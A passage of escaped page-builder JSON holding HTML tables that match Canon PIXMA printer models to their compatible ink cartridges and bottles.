(Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td 